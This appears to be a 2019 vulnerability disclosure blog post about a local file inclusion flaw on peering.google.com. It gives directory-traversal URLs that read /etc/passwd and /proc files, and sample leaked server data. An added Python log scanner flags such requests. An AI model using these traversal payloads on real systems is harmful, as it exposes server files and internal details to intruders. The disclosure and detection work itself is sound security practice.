
Tuesday, May 21, 2019

Local File Inclusion in peering.google.com


I found a Local File Inclusion (LFI) vulnerability in "Google's Edge Network".

Description

As is well known, the impact of exploiting a Local File Inclusion (LFI) vulnerability ranges from information disclosure to complete compromise of the system. Even when the included file is not executed, it can still give an attacker enough valuable information to compromise the system, as is the case with the vulnerability reported here.

Impact

Disclosure of local server information.


Reproduction Steps
  1. Open any picture in another window, for example: "https://peering.google.com/static/images/couch-ipad.png".
  2. Add one of these values at the end of the link: "../../../../../../../etc/passwd" OR "../../../../../../../proc/self/cmdline" OR "../../../../../../../proc/self/stat" OR "../../../../../../../proc/self/status".
  3. In this way: "https://peering.google.com/static/images/couch-ipad.png../../../../../../../proc/self/cmdline".
  4. Now you are viewing sensitive information about the server.

Example Leak Data:

1. The attacker gets information about the server and kernel. PoC: "/proc/version" OR "/proc/cpuinfo" OR "/proc/meminfo". Example leak data: "Linux version 3.*.* #1 SMP".

2. The attacker gets information about the files on the server. PoC: "/proc/self/cmdline". Example: "server_software=Google App Engine/1.*.*".

3. The attacker gets information about the internal network. PoC: "/proc/self/cmdline". Example: "apihost_address=169.*.*.253:* /server_address=169.*.*.2:*".

4. The attacker gets information about the processes and the time they have been running on the server. PoC: "/proc/self/stat". Example: "(python27g_runti)".

5. The attacker gets sensitive information about the running process and the capacity of the system, which could help in sizing a denial-of-service attack. PoC: "/proc/self/status". Example: "FDSize: 11, VmSize: 1134532 kB, VmRSS: 134860 kB, Threads: 17".

and more...
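Each of the requests listed above leaves a distinctive trace in the web server's access log: a static-file URL containing `..` segments that resolves to `/etc/passwd` or somewhere under `/proc/`. The following is an added example (not part of the original post) of a small log scanner that decodes request paths and flags such requests; the log lines are constructed for this example in Common Log Format, with documentation-range IP addresses, and `flag_traversal` is a name chosen here.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). Addresses are from
# the documentation ranges; the paths mirror the URLs in the write-up.
SAMPLE_LOG = """\
203.0.113.7 - - [21/May/2019:10:00:01 +0000] "GET /static/images/couch-ipad.png HTTP/1.1" 200 4821
203.0.113.7 - - [21/May/2019:10:00:09 +0000] "GET /static/images/couch-ipad.png../../../../../../../proc/self/cmdline HTTP/1.1" 200 612
198.51.100.4 - - [21/May/2019:10:01:13 +0000] "GET /static/images/couch-ipad.png%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1713
198.51.100.4 - - [21/May/2019:10:01:30 +0000] "GET /static/css/main.css HTTP/1.1" 200 3300
"""

# ip, ident, user, [timestamp], "METHOD path PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A '..' path segment, checked on the decoded path so %2e%2e is caught too.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
# Files the write-up shows being read through the traversal.
SENSITIVE_RE = re.compile(r'/etc/passwd|/proc/(self|\d+)/')


def flag_traversal(log_text):
    """Return one record per request that looks like a directory traversal.

    Each record carries the client IP, the raw path, the HTTP status and the
    reasons it was flagged. A 200 on a flagged path is the strongest signal:
    the server actually served the file.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Decode twice so a double-encoded %252e%252e is also normalised.
        decoded = unquote(unquote(m["path"]))
        reasons = []
        if TRAVERSAL_RE.search(decoded):
            reasons.append("dot-dot segment")
        if SENSITIVE_RE.search(decoded):
            reasons.append("sensitive target")
        if reasons:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": m["path"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


def served_hits(log_text):
    """Only the flagged requests the server answered with 200."""
    return [h for h in flag_traversal(log_text) if h["status"] == 200]


if __name__ == "__main__":
    for h in flag_traversal(SAMPLE_LOG):
        print(h["ip"], h["status"], ", ".join(h["reasons"]), h["path"])
```

Run against a real log, the interesting output is the set of flagged requests with a 200 status: a 404 or 403 on a traversal path is a probe, a 200 is a file that left the server. The two regexes are deliberately narrow to the paths named in this write-up; a production rule would extend `SENSITIVE_RE` with the other files the application could expose.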